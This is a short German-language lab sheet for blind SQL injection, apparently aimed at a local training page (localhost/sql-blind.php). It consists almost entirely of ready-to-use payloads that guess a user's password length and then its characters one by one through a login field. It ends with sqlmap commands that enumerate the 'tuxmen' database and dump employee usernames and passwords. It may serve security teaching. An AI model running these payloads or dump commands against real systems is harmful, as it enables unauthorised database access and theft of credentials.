Blind SQL Injection Testformular

⚠️ Hinweis: Hinter -- muss ein Leerzeichen stehen (-- ) – sonst wird der Kommentar nicht erkannt!


Stufe 1 – Passwortlänge erraten

hans' AND LENGTH(password) < '10' -- 
hans' AND LENGTH(password) < '5' -- 
hans' AND LENGTH(password) = '4' -- ✅

Stufe 2 – Zeichenweise vergleichen

hans' AND SUBSTRING(password,1,1) = '1' -- 
hans' AND SUBSTRING(password,2,1) = '2' -- 
hans' AND SUBSTRING(password,3,1) = '3' -- 
hans' AND SUBSTRING(password,4,1) = '4' -- ✅

Stufe 3 – Kompletter Passwort-Vergleich

hans' AND password = '1234' -- ✅

Automatisiert mit sqlmap (Ablauf)

1. Schwachstelle erkennen

sqlmap -u http://localhost/sql-blind.php --data="username=hans" --technique=B --batch

2. Tabellen anzeigen

sqlmap -u http://localhost/sql-blind.php --data="username=hans" \
  -D tuxmen --tables --batch

3. Spalten in der Tabelle "mitarbeiter"

sqlmap -u http://localhost/sql-blind.php --data="username=hans" \
  -D tuxmen -T mitarbeiter --columns --batch

4. Dump des Passworts

sqlmap -u http://localhost/sql-blind.php --data="username=hans" \
  -D tuxmen -T mitarbeiter -C username,password --dump --technique=B --batch